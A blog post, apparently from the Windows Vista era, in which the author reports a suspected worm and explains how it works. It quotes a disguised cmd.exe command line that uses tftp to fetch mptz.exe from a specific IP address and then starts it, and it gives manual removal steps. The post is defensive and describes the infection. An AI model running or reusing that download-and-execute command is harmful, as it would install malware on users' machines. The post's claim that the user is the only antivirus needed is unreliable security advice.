new virus ???

Goodmorning,

today I was working at my computer when unexpectedly the friendly Windows Vista Search System ( Search Utility) pop out…looking for…??????????????

%comspec% /c echo Repairing user32.dll & echo Please wait… & tftp -i 76.203.188.177 GET mptz.exe & start mptz&

well…I admit I love Vista….it’s so secure !!!!!!!!!!!!!
what, the hell,  is happening ???????
That Vista Firewall is working ???????????? or no????
And the Updates ???? why I’m installing each one if they’re useless ?????????

I’ve probably received a new connection from an unknown IP address…scanning..thousands of address….
and trying to spread himself…over MY network…using a Vista Bug…but what is happening NOW ?

The environment variable %comspec% given at the Run menù simply starts the default command shell (cmd.exe)…

Then this shell with echo shows “Repairing user32.dll & echo Please wait… ” after this…the system connects via FTP to 76.203.188.177 and with a GET command downloads mptz.exe and starts it with the start command…
and the virus…spreads again….
Unfortunately….the good Process Explorer helped me…KILLING the task……………….

Looking into google for mptz.exe…offers no results…so I think it is a new virus…starting in these days…

But who is 76.203.188.177 ???
at this whois service i got:

Registry Whois

OrgName:    AT&T Internet Services
OrgID:      SIS-80
Address:    2701 N. Central Expwy # 2205.14
City:       Richardson
StateProv:  TX
PostalCode: 75080
Country:    US

NetRange:   76.192.0.0 – 76.255.255.255
CIDR:       76.192.0.0/10
NetName:    SBCIS-SBIS-6BLK
NetHandle:  NET-76-192-0-0-1
Parent:     NET-76-0-0-0-0
NetType:    Direct Allocation
NameServer: NS1.SWBELL.NET
NameServer: NS2.SWBELL.NET
Comment:    Contact  for general IP
Comment:    Administration support.
RegDate:    2006-09-15
Updated:    2007-05-25

 

So ???? The AT&T System is trying to hack me ?????????? 😀

nooo……

anyway;

Solution: ” To Eliminate the Virus,
1_ KILL THE TASK named mptz.exe,

2_ then “jump” into your System32 dir

3_ and delete : mptz.exe, gebxwvv.dll and awtqp.dll

YOU are the only antivirus needed for your system

Hope this…was Useful…

Seeyou….

Technorati Tags:

Advertisements

2 thoughts on “new virus ???

  1. Wow. Interesting viewpoint. I enjoyed how you protected this subject….
    A few issues I dont accept but hey… thats a new outlook.
    I am super-keen to read your next post. Is it possible to make the next one more
    indepth? Thanks 🙂

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s